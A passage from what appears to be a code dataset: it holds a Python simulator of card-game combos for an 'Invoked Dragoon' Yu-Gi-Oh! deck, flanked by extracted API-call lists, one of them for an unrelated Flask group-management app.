'flask.request.values.get', 'request.values.get', (['"""description"""'], {'default': 'None'}), "('description', default=None)\n", (5689, 5718), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((6988, 7034), 'flask.request.args.get', 'request.args.get', (['"""count"""'], {'default': '(5)', 'type': 'int'}), "('count', default=5, type=int)\n", (7004, 7034), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((7048, 7095), 'flask.request.args.get', 'request.args.get', (['"""offset"""'], {'default': '(0)', 'type': 'int'}), "('offset', default=0, type=int)\n", (7064, 7095), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((9195, 9214), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (9212, 9214), False, 'from app.models import db\n'), ((9219, 9291), 'flask.flash', 'flash', (['f"""Successfully changed the roles in 
{ag.display_name}"""', '"""success"""'], {}), "(f'Successfully changed the roles in {ag.display_name}', 'success')\n", (9224, 9291), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10453, 10471), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (10469, 10471), False, 'from app.models import db\n'), ((11317, 11336), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (11334, 11336), False, 'from app.models import db\n'), ((12232, 12263), 'app.util.user.get_user_by_username', 'get_user_by_username', (['user_name'], {}), '(user_name)\n', (12252, 12263), False, 'from app.util.user import get_user_by_username\n'), ((12879, 12897), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (12895, 12897), False, 'from app.models import db\n'), ((14391, 14412), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (14408, 14412), False, 'from app.models import db\n'), ((14440, 14459), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (14457, 14459), False, 'from app.models import db\n'), ((14517, 14587), 'flask.flash', 'flash', (['f"""You successfully deleted the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You successfully deleted the AG {ag.display_name}', 'success')\n", (14522, 14587), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((6275, 6295), 'app.models.db.session.merge', 'db.session.merge', (['ag'], {}), '(ag)\n', (6291, 6295), False, 'from app.models import db\n'), ((6304, 6323), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (6321, 6323), False, 'from app.models import db\n'), ((6439, 6451), 'werkzeug.exceptions.BadRequest', 'BadRequest', ([], {}), '()\n', (6449, 6451), False, 'from werkzeug.exceptions import BadRequest, PreconditionFailed\n'), ((8387, 8414), 'flask.request.values.get', 'request.values.get', (['user_id'], {}), '(user_id)\n', (8405, 8414), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((8963, 9017), 'flask.flash', 'flash', (['u"""An AG needs a minimum of one Mentor"""', '"""error"""'], {}), "(u'An AG needs a minimum of one Mentor', 'error')\n", (8968, 9017), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((9312, 9355), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (9319, 9355), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10164, 10219), 'flask.flash', 'flash', (['"""You cannot leave an AG you are not in"""', '"""error"""'], {}), "('You cannot leave an AG you are not in', 'error')\n", (10169, 10219), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10577, 10598), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (10594, 10598), False, 'from app.models import db\n'), ((10607, 10625), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (10623, 10625), False, 'from app.models import db\n'), ((10667, 10737), 'flask.flash', 'flash', (['f"""You sucessfully left and deleted the AG {ag.name}"""', '"""success"""'], {}), "(f'You sucessfully left and deleted the AG {ag.name}', 'success')\n", (10672, 10737), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11357, 11373), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (11364, 11373), 
False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((12523, 12588), 'flask.flash', 'flash', (['f"""You cannot kick {user.username} from {ag.display_name}."""'], {}), "(f'You cannot kick {user.username} from {ag.display_name}.')\n", (12528, 12588), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13021, 13042), 'app.models.db.session.delete', 'db.session.delete', (['ag'], {}), '(ag)\n', (13038, 13042), False, 'from app.models import db\n'), ((13051, 13070), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (13068, 13070), False, 'from app.models import db\n'), ((13079, 13157), 'flask.flash', 'flash', (['f"""You sucessfully left and deleted the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You sucessfully left and deleted the AG {ag.display_name}', 'success')\n", (13084, 13157), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13646, 13689), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (13653, 13689), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((14608, 14624), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (14615, 14624), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2391, 2418), 'flask.jsonify', 'jsonify', (["{'reason': 'name'}"], {}), "({'reason': 'name'})\n", (2398, 2418), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2593, 2628), 'flask.jsonify', 'jsonify', (["{'reason': 'display_name'}"], {}), "({'reason': 'display_name'})\n", (2600, 2628), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((2650, 2692), 're.match', 're.match', (['AGRegex.description', 'description'], {}), '(AGRegex.description, description)\n', (2658, 2692), False, 'import re\n'), ((2710, 2744), 'flask.jsonify', 'jsonify', (["{'reason': 'description'}"], {}), "({'reason': 'description'})\n", (2717, 2744), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((5884, 5928), 're.match', 're.match', (['AGRegex.display_name', 'display_name'], {}), '(AGRegex.display_name, display_name)\n', (5892, 5928), False, 'import re\n'), ((6039, 6081), 're.match', 're.match', (['AGRegex.description', 'description'], {}), '(AGRegex.description, description)\n', (6047, 6081), False, 'import re\n'), ((6339, 6369), 'flask.jsonify', 'jsonify', (["{'status': 'success'}"], {}), "({'status': 'success'})\n", (6346, 6369), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((8856, 8874), 'app.models.db.session.flush', 'db.session.flush', ([], {}), '()\n', (8872, 8874), False, 'from app.models import db\n'), ((9042, 9084), 'flask.url_for', 'url_for', (['"""ag.ag_settings"""'], {'ag_name': 'ag_name'}), "('ag.ag_settings', ag_name=ag_name)\n", (9049, 9084), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10244, 10287), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (10251, 10287), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((10942, 11028), 'flask.flash', 'flash', (['f"""You cannot leave an AG, when there is no Mentor left afterwards"""', '"""error"""'], {}), "(f'You cannot leave an AG, when there is no Mentor 
left afterwards',\n 'error')\n", (10947, 11028), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11156, 11214), 'flask.flash', 'flash', (['f"""You sucessfully left the AG {ag.name}"""', '"""success"""'], {}), "(f'You sucessfully left the AG {ag.name}', 'success')\n", (11161, 11214), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((12613, 12656), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (12620, 12656), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13182, 13198), 'flask.url_for', 'url_for', (['"""index"""'], {}), "('index')\n", (13189, 13198), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13304, 13375), 'flask.flash', 'flash', (['f"""You cannot kick the last Mentor of {ag.display_name}"""', '"""error"""'], {}), "(f'You cannot kick the last Mentor of {ag.display_name}', 'error')\n", (13309, 13375), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13475, 13568), 'flask.flash', 'flash', (['f"""You sucessfully kicked {user.username} from the AG {ag.display_name}"""', '"""success"""'], {}), "(f'You sucessfully kicked {user.username} from the AG {ag.display_name}',\n 'success')\n", (13480, 13568), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((13573, 13592), 'app.models.db.session.commit', 'db.session.commit', ([], {}), '()\n', (13590, 13592), False, 'from app.models import db\n'), ((2345, 2373), 're.match', 're.match', (['AGRegex.name', 'name'], {}), '(AGRegex.name, name)\n', (2353, 2373), False, 'import re\n'), ((2531, 2575), 're.match', 're.match', (['AGRegex.display_name', 'display_name'], {}), '(AGRegex.display_name, display_name)\n', (2539, 2575), False, 'import re\n'), ((3484, 3524), 'flask.url_for', 'url_for', (['"""ag.invite_ag"""'], {'ag_name': 'ag.name'}), "('ag.invite_ag', ag_name=ag.name)\n", (3491, 3524), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((11049, 11092), 'flask.url_for', 'url_for', (['"""ag.ag_dashboard"""'], {'ag_name': 'ag_name'}), "('ag.ag_dashboard', ag_name=ag_name)\n", (11056, 11092), False, 'from flask import Blueprint, request, jsonify, g, url_for, flash, redirect\n'), ((7220, 7243), 'app.models.ag.AG.query.offset', 'AG.query.offset', (['offset'], {}), '(offset)\n', (7235, 7243), False, 'from app.models.ag import AG, AGSchema, AGSchemaIntern\n'), ((8564, 8618), 'sqlalchemy.sql.and_', 'and_', (['(UserAG.user_id == user_id)', '(UserAG.ag_id == ag.id)'], {}), '(UserAG.user_id == user_id, UserAG.ag_id == ag.id)\n', (8568, 8618), False, 'from sqlalchemy.sql import exists, and_\n'), ((12283, 12307), 'app.models.db.session.query', 'db.session.query', (['UserAG'], {}), '(UserAG)\n', (12299, 12307), False, 'from app.models import db\n'), ((4040, 4048), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (4046, 4048), False, 'from sqlalchemy.sql import exists, and_\n'), ((4775, 4783), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (4781, 4783), False, 'from sqlalchemy.sql import exists, and_\n'), ((8532, 8556), 'app.models.db.session.query', 'db.session.query', (['UserAG'], {}), '(UserAG)\n', (8548, 8556), False, 'from app.models import db\n'), ((2278, 2286), 'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (2284, 2286), False, 'from sqlalchemy.sql import exists, and_\n'), ((2448, 2456), 
'sqlalchemy.sql.exists', 'exists', ([], {}), '()\n', (2454, 2456), False, 'from sqlalchemy.sql import exists, and_\n')]
|
from typing import List, Optional, Tuple
from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game
class InvokedDragoonManager(Manager):
# Invoked
aleister = Card("Aleister the Invoker", CardType.MONSTER)
invocation = Card("Invocation", CardType.SPELL)
meltdown = Card("Magical Meltdown", CardType.SPELL)
terraforming = Card("Terraforming", CardType.SPELL)
# Extenders
jester = Card("Jester Confit", CardType.MONSTER)
souls = Card("Magicians' Souls", CardType.MONSTER)
# Trickstar Engine
candina = Card("Trickstar Candina", CardType.MONSTER)
corobane = Card("Trickstar Corobane", CardType.MONSTER)
lightstage = Card("Trickstar Lightstage", CardType.SPELL)
set_rotation = Card("Set Rotation", CardType.SPELL)
# Draw
desires = Card("Pot of Desires", CardType.SPELL)
upstart = Card("Upstart Goblin", CardType.SPELL)
# Hand Traps
nibiru = Card("Nibiru, the Primal Being", CardType.MONSTER)
ash = Card("Ash Blossom & Joyous Spring", CardType.MONSTER)
ogre = Card("Ghost Ogre & Snow Rabbit", CardType.MONSTER)
droll = Card("Droll & Lock Bird", CardType.MONSTER)
veiler = Card("Effect Veiler", CardType.MONSTER)
gamma = Card("PSY-Framegear Gamma", CardType.MONSTER)
driver = Card("PSY-Frame Driver", CardType.MONSTER)
crow = Card("D.D. Crow", CardType.MONSTER)
belle = Card("Ghost Belle & Haunted Mansion", CardType.MONSTER)
meister = Card("Skull Meister", CardType.MONSTER)
imperm = Card("Infinite Impermanence", CardType.TRAP)
# Dragoons
dm = Card("Dark Magician", CardType.MONSTER)
red_eyes = Card("Red-Eyes Black Dragon", CardType.MONSTER)
ref = Card("Red-Eyes Fusion", CardType.SPELL)
magicalized_fusion = Card("Magicalized Fusion", CardType.SPELL)
# Misc
fleur = Card("<NAME>, the Knighted", CardType.MONSTER)
droplet = Card("Forbidden Droplet", CardType.SPELL)
called = Card("Called by the Grave", CardType.SPELL)
cyclone = Card("Cosmic Cyclone", CardType.SPELL)
duster = Card("Harpie's Feather Duster", CardType.SPELL)
mind_control = Card("Mind Control", CardType.SPELL)
prison = Card("Ice Dragon's Prison", CardType.TRAP)
judgment = Card("Solemn Judgment", CardType.TRAP)
# Extra Deck
carrier = Card("Union Carrier", CardType.EXTRA_DECK)
almiraj = Card("Salamangreat Almiraj", CardType.EXTRA_DECK)
gardna = Card("Secure Gardna", CardType.EXTRA_DECK)
artemis = Card("Artemis, the Magistus Moon Maiden", CardType.EXTRA_DECK)
mechaba = Card("Invoked Mechaba", CardType.EXTRA_DECK)
augoeides = Card("Invoked Augoeides", CardType.EXTRA_DECK)
purgatrio = Card("Invoked Purgatrio", CardType.EXTRA_DECK)
omega = Card("Psy-framelord Omega", CardType.EXTRA_DECK)
verte = Card("Predaplant Verte Anaconda", CardType.EXTRA_DECK)
dragoon = Card("Red-Eyes Dark Dragoon", CardType.EXTRA_DECK)
# Disruptions
disr_dragoon = Disruption(repr(dragoon), 8)
disr_mechaba_m = Disruption(f"{repr(mechaba)} (M)", 2)
disr_mechaba_s = Disruption(f"{repr(mechaba)} (S)", 0)
disr_mechaba_t = Disruption(f"{repr(mechaba)} (T)", 0)
disr_prison = Disruption(repr(prison), 2)
disr_judgment = Disruption(repr(judgment), 2)
disr_aleister = Disruption(repr(aleister), 1)
# Lists
hand_traps = (ash, ogre, veiler, imperm, nibiru, droll, crow, belle, meister, gamma)
protection = (belle, called)
cards_to_set = (judgment, droplet, called, imperm, prison, cyclone)
discards = (driver, duster, mind_control, upstart, cyclone)
light_monsters = (corobane, candina, artemis, gardna, fleur)
not_opt = (imperm, crow, meister, veiler, cyclone)
going_second = (duster, mind_control)
verte_materials = (
aleister,
candina,
corobane,
souls,
jester,
fleur,
) # artemis, almiraj, gardna?
standard_decklist = DeckList(
(
(aleister, 3),
(invocation, 2),
(meltdown, 3),
(terraforming, 1),
(prison, 2),
(imperm, 3),
(ash, 3),
(souls, 3),
(dm, 2),
# (fleur, 1),
(red_eyes, 2),
(ref, 3),
(magicalized_fusion, 1),
(candina, 1),
(corobane, 1),
(lightstage, 1),
# (upstart, 1),
(cyclone, 2),
(judgment, 2),
(upstart, 1),
(duster, 1),
(mind_control, 1),
(set_rotation, 1),
(called, 1),
),
(
(almiraj, 1),
(artemis, 1),
(gardna, 1),
(mechaba, 2),
(purgatrio, 1),
(augoeides, 1),
(omega, 1),
(dragoon, 2),
(verte, 2),
),
)
default_decklist = standard_decklist
#########
# Helpers
#########
@classmethod
def generate_stats(cls, end_games: List[Game]) -> List[List[str]]:
return [
["Dragoon", cls.percent_with_flags(end_games, ["dragoon"])],
["Mechaba", cls.percent_with_flags(end_games, ["mechaba"])],
["Both", cls.percent_with_flags(end_games, ["dragoon", "mechaba"])],
["3+ Disruptions", cls.percent_with_flags(end_games, ["3+ disruptions"])],
["Bricks", cls.percent_with_flags(end_games, ["brick"])],
]
def postprocess(self, game: Game):
return game
def endphase(self, game: Game):
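        # Set any backrow cards still in hand, then count the board's
        # disruptions and flag bricks (fewer than 3 disruptions and no Dragoon).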
for card in game.hand.cards[:]: # make a copy so we can modify hand
if card in self.cards_to_set:
game.move(game.hand, game.backrow, card)
# Process Disruptions
        pure_disruptions = 0
        if self.dragoon in game.monsters and len(game.hand):
            game.add_flag("dragoon")
            game.disruptions.add(self.disr_dragoon)
            pure_disruptions += 1
        if self.mechaba in game.monsters:
            for card in game.hand:
                game.add_flag("mechaba")
                if card.card_type == CardType.MONSTER:
                    game.disruptions.add(self.disr_mechaba_m)
                elif card.card_type == CardType.SPELL:
                    game.disruptions.add(self.disr_mechaba_s)
                elif card.card_type == CardType.TRAP:
                    game.disruptions.add(self.disr_mechaba_t)
        if game.has_flag("mechaba"):
            pure_disruptions += 1
        for card in game.hand:
            if card in self.hand_traps:
                if card == self.gamma and self.driver in game.banished:
                    continue
                if card == self.imperm:
                    continue
                pure_disruptions += 1
                game.disruptions.add(Disruption(repr(card), 1))
        for card in game.backrow:
            if card in self.cards_to_set:
                pure_disruptions += 1
                if card == self.prison:
                    game.disruptions.add(self.disr_prison)
                elif card == self.judgment:
                    game.disruptions.add(self.disr_judgment)
                else:
                    game.disruptions.add(Disruption(repr(card), 1))
        if pure_disruptions >= 3:
            game.add_flag("3+ disruptions")
        if pure_disruptions < 3 and not game.has_flag("dragoon"):
            game.add_flag("brick")
return game
def get_redundant_cards_in_hand(
self, game: Game, include_useful: bool = False
) -> List[Card]:
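        """Rank hand cards from most to least redundant.

        Singles with a live hard once-per-turn score 0; spent singles and
        duplicates score higher; triples score highest.
        """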
redundant_cards = {} # higher value means more redundant
hand = game.hand.cards[:]
for card in hand:
            if (count := hand.count(card)) == 1:  # parenthesize so count binds to the int, not the comparison
if game.hopt_available(card):
redundant_cards[card] = 0
else:
redundant_cards[card] = 2
elif count == 2:
if card in self.not_opt:
redundant_cards[card] = 1
else:
redundant_cards[card] = 2
else:
redundant_cards[card] = 3
to_return = sorted(
redundant_cards.keys(), key=lambda x: redundant_cards[x], reverse=True
)
if include_useful:
return to_return
else:
return [card for card in to_return if redundant_cards[card] > 1]
def find_dragoons_materials(
self, game: Game
) -> Tuple[Optional[CardGroup], Optional[CardGroup]]:
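        """Locate Dark Magician and Red-Eyes (deck or hand) for Red-Eyes Fusion."""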
dm_location, red_eyes_location = None, None
if self.dm in game.deck:
dm_location = game.deck
elif self.dm in game.hand:
dm_location = game.hand
if self.red_eyes in game.deck:
red_eyes_location = game.deck
elif self.red_eyes in game.hand:
red_eyes_location = game.hand
return dm_location, red_eyes_location
#########
# Selects
#########
def select_invocation_banish_from_grave(self, game: Game) -> Optional[Card]:
return game.grave.get_any(self.light_monsters)
def select_invocation_banish_from_field(self, game: Game) -> Optional[Card]:
return game.monsters.get_any(self.light_monsters)
def select_souls_dump(self, game: Game) -> Optional[Card]:
if self.dm in game.deck:
return self.dm
else:
return None
def select_souls_fodder(self, game: Game, count: int) -> List[Card]:
fodder = []
cards = self.get_redundant_cards_in_hand(game, include_useful=False)
while cards and len(fodder) < count:
card = cards.pop()
if card.card_type in [CardType.SPELL, CardType.TRAP]:
fodder.append(card)
return fodder
def select_terraforming_target(self, game: Game) -> Optional[Card]:
if (
self.meltdown in game.deck
and game.hopt_available(self.meltdown)
and self.meltdown not in game.hand
and self.aleister not in game.hand
):
return self.meltdown
elif (
self.lightstage in game.deck
and self.lightstage not in game.hand
and not (self.corobane in game.hand and self.candina in game.hand)
):
return self.lightstage
elif self.meltdown in game.deck:
return self.meltdown
elif self.lightstage in game.deck:
return self.lightstage
else:
return None
    def select_set_rotation_targets(self, game: Game) -> Tuple[Optional[Card], Optional[Card]]:
my_card, opp_card = None, None
if self.meltdown in game.hand or self.aleister in game.hand:
# we have a path to aleister. give them meltdown and take stage for corobane
if self.lightstage in game.deck:
my_card = self.lightstage
if self.meltdown in game.deck:
opp_card = self.meltdown
else:
if self.meltdown in game.deck:
my_card = self.meltdown
if self.lightstage in game.deck:
opp_card = self.lightstage
return my_card, opp_card
#########
# Actions
#########
def action_use_upstart(self, game: Game) -> Optional[Game]:
if self.upstart in game.hand and len(game.deck) > 1:
game.move(game.hand, game.grave, self.upstart)
game.draw()
return game
def action_use_terraforming(self, game: Game) -> Optional[Game]:
if self.terraforming in game.hand and game.hopt_available(self.terraforming):
target = self.select_terraforming_target(game)
if not target:
return None
game.move(game.hand, game.grave, self.terraforming)
game.move(game.deck, game.hand, target)
game.use_hopt(self.terraforming)
return game
def action_use_set_rotation(self, game: Game) -> Optional[Game]:
if self.set_rotation in game.hand:
my_card, opp_card = self.select_set_rotation_targets(game)
if not (my_card and opp_card):
return None
else:
game.use_resource("activate field spell")
game.move(game.hand, game.grave, self.set_rotation)
game.move(game.deck, game.backrow, my_card)
game.deck.cards.remove(opp_card)
return game
def action_use_meltdown(self, game: Game) -> Optional[Game]:
if (
self.meltdown in game.hand
and game.hopt_available(self.meltdown)
and game.resource_available("activate field spell")
):
game.move(game.hand, game.backrow, self.meltdown)
game.use_hopt(self.meltdown)
if self.aleister in game.deck:
game.move(game.deck, game.hand, self.aleister)
return game
def action_summon_aleister(self, game: Game) -> Optional[Game]:
if (
self.aleister in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.aleister)
game.use_resource("normal summon")
if self.invocation in game.deck:
game.move(game.deck, game.hand, self.invocation)
game.use_hopt(self.aleister)
return game
def action_summon_artemis(self, game: Game) -> Optional[Game]:
if self.artemis in game.extra_deck and game.resource_available("summon"):
if self.aleister in game.monsters:
game.move(game.monsters, game.grave, self.aleister)
elif self.jester in game.monsters:
game.move(game.monsters, game.grave, self.jester)
elif self.souls in game.monsters:
game.move(game.monsters, game.grave, self.souls)
else:
return None
game.move(game.extra_deck, game.monsters, self.artemis)
return game
def action_summon_almiraj(self, game: Game) -> Optional[Game]:
if (
self.almiraj in game.extra_deck
and self.aleister in game.monsters
and game.resource_available("summon")
):
game.move(game.monsters, game.grave, self.aleister)
game.move(game.extra_deck, game.monsters, self.almiraj)
return game
def action_summon_gardna(self, game: Game) -> Optional[Game]:
if (
self.gardna in game.extra_deck
and self.almiraj in game.monsters
and game.resource_available("summon")
):
game.move(game.monsters, game.grave, self.almiraj)
game.move(game.extra_deck, game.monsters, self.gardna)
return game
def action_summon_souls(self, game: Game) -> Optional[Game]:
if (
self.souls in game.hand
and game.hopt_available(self.souls, "summon")
and game.resource_available("summon")
):
dump_target = self.select_souls_dump(game)
if not dump_target:
return None
game.move(game.deck, game.grave, dump_target)
game.move(game.hand, game.monsters, self.souls)
game.use_hopt(self.souls, "summon")
return game
def action_normal_summon_souls(self, game: Game) -> Optional[Game]:
if (
self.souls in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.souls)
return game
def action_use_souls(self, game: Game) -> Optional[Game]:
if self.souls in game.monsters and game.hopt_available(self.souls, "draw"):
game.use_hopt(self.souls, "draw")
if self.meltdown in game.backrow:
game.move(game.backrow, game.grave, self.meltdown)
game.draw()
fodder = self.select_souls_fodder(game, 1)
if fodder:
game.move(game.hand, game.grave, fodder[0])
game.draw()
else:
fodder = self.select_souls_fodder(game, 2)
if not fodder:
return None
while fodder:
game.move(game.hand, game.grave, fodder.pop())
game.draw()
return game
def action_summon_jester(self, game: Game) -> Optional[Game]:
if (
self.jester in game.hand
and game.hopt_available(self.jester)
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.jester)
game.use_hopt(self.jester)
return game
def action_normal_summon_jester(self, game: Game) -> Optional[Game]:
if (
self.jester in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.jester)
return game
def action_summon_corobane(self, game: Game) -> Optional[Game]:
if (
self.corobane in game.hand
and game.hopt_available(self.corobane)
and not game.monsters.cards
and game.resource_available("summon")
):
game.move(game.hand, game.monsters, self.corobane)
game.use_hopt(self.corobane)
return game
def action_normal_summon_candina(self, game: Game) -> Optional[Game]:
if (
self.candina in game.hand
and game.resource_available("normal summon")
and game.resource_available("summon")
):
game.use_resource("normal summon")
game.move(game.hand, game.monsters, self.candina)
if self.lightstage in game.deck:
game.move(game.deck, game.hand, self.lightstage)
elif self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
return game
def action_use_lightstage(self, game: Game) -> Optional[Game]:
if (
self.lightstage in game.hand
and any(card in game.deck for card in [self.corobane, self.candina])
and game.resource_available("activate field spell")
):
if self.meltdown in game.hand or self.aleister in game.hand:
game.move(game.hand, game.backrow, self.lightstage)
                # search corobane; aleister will be normal summoned
if self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
elif self.candina in game.deck:
game.move(game.deck, game.hand, self.candina)
return game
else:
game.move(game.hand, game.backrow, self.lightstage)
# search candina to normal
if self.candina in game.deck:
game.move(game.deck, game.hand, self.candina)
elif self.corobane in game.deck:
game.move(game.deck, game.hand, self.corobane)
return game
def action_summon_mechaba(self, game: Game) -> Optional[Game]:
if (
self.invocation in game.hand
and self.mechaba in game.extra_deck
and game.resource_available("summon")
):
if self.aleister in game.grave:
game.move(game.grave, game.banished, self.aleister)
elif self.aleister in game.monsters:
game.move(game.monsters, game.banished, self.aleister)
else:
return None
if grave_target := self.select_invocation_banish_from_grave(game):
game.move(game.grave, game.banished, grave_target)
elif field_target := self.select_invocation_banish_from_field(game):
game.move(game.monsters, game.banished, field_target)
else:
return None
game.move(game.hand, game.grave, self.invocation)
game.move(game.extra_deck, game.monsters, self.mechaba)
if game.hopt_available(self.invocation, "recycle"):
game.use_hopt(self.invocation, "recycle")
game.move(game.grave, game.deck, self.invocation)
game.move(game.banished, game.hand, self.aleister)
game.deck.shuffle()
return game
def action_summon_verte(self, game: Game) -> Optional[Game]:
if self.verte in game.extra_deck and game.resource_available("summon"):
materials = []
monsters = game.monsters.cards[:]
while len(materials) < 2 and monsters:
card = monsters.pop()
if card in self.verte_materials:
materials.append(card)
if len(materials) < 2:
return None
for material in materials:
game.move(game.monsters, game.grave, material)
game.move(game.extra_deck, game.monsters, self.verte)
return game
def action_use_verte(self, game: Game) -> Optional[Game]:
if (
self.verte in game.monsters
and game.hopt_available(self.verte)
and self.ref in game.deck
and self.dragoon in game.extra_deck
):
dm_location, red_eyes_location = self.find_dragoons_materials(game)
if not (dm_location and red_eyes_location):
return None
game.use_hopt(self.verte)
game.move(game.deck, game.grave, self.ref)
game.move(dm_location, game.grave, self.dm)
game.move(red_eyes_location, game.grave, self.red_eyes)
game.move(game.extra_deck, game.monsters, self.dragoon)
game.use_resource("summon")
return game
def action_use_ref(self, game: Game) -> Optional[Game]:
if (
self.ref in game.hand
and self.dragoon in game.extra_deck
and not game.monsters.cards
):
dm_location, red_eyes_location = self.find_dragoons_materials(game)
if not (dm_location and red_eyes_location):
return None
game.move(game.hand, game.grave, self.ref)
game.move(dm_location, game.grave, self.dm)
game.move(red_eyes_location, game.grave, self.red_eyes)
game.move(game.extra_deck, game.monsters, self.dragoon)
game.use_resource("summon")
return game
def action_summon_fleur(self, game: Game) -> Optional[Game]:
if (
self.fleur in game.hand
and game.resource_available("summon")
and any(card.card_type == CardType.EXTRA_DECK for card in game.monsters)
):
game.move(game.hand, game.monsters, self.fleur)
return game
|
[
"framework.DeckList",
"framework.Card"
] |
[((195, 241), 'framework.Card', 'Card', (['"""Aleister the Invoker"""', 'CardType.MONSTER'], {}), "('Aleister the Invoker', CardType.MONSTER)\n", (199, 241), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((259, 293), 'framework.Card', 'Card', (['"""Invocation"""', 'CardType.SPELL'], {}), "('Invocation', CardType.SPELL)\n", (263, 293), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((309, 349), 'framework.Card', 'Card', (['"""Magical Meltdown"""', 'CardType.SPELL'], {}), "('Magical Meltdown', CardType.SPELL)\n", (313, 349), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((369, 405), 'framework.Card', 'Card', (['"""Terraforming"""', 'CardType.SPELL'], {}), "('Terraforming', CardType.SPELL)\n", (373, 405), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((436, 475), 'framework.Card', 'Card', (['"""Jester Confit"""', 'CardType.MONSTER'], {}), "('Jester Confit', CardType.MONSTER)\n", (440, 475), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((488, 530), 'framework.Card', 'Card', (['"""Magicians\' Souls"""', 'CardType.MONSTER'], {}), '("Magicians\' Souls", CardType.MONSTER)\n', (492, 530), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((569, 612), 'framework.Card', 'Card', (['"""Trickstar Candina"""', 'CardType.MONSTER'], {}), "('Trickstar Candina', CardType.MONSTER)\n", (573, 612), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((628, 672), 'framework.Card', 'Card', (['"""Trickstar Corobane"""', 'CardType.MONSTER'], {}), "('Trickstar Corobane', CardType.MONSTER)\n", (632, 672), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((690, 734), 'framework.Card', 'Card', (['"""Trickstar Lightstage"""', 'CardType.SPELL'], {}), "('Trickstar Lightstage', CardType.SPELL)\n", (694, 734), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, Card, Game\n'), ((754, 790), 'framework.Card', 'Card', (['"""Set Rotation"""', 'CardType.SPELL'], {}), "('Set Rotation', CardType.SPELL)\n", (758, 790), False, 'from framework import CardGroup, CardType, DeckList, Disruption, Manager, 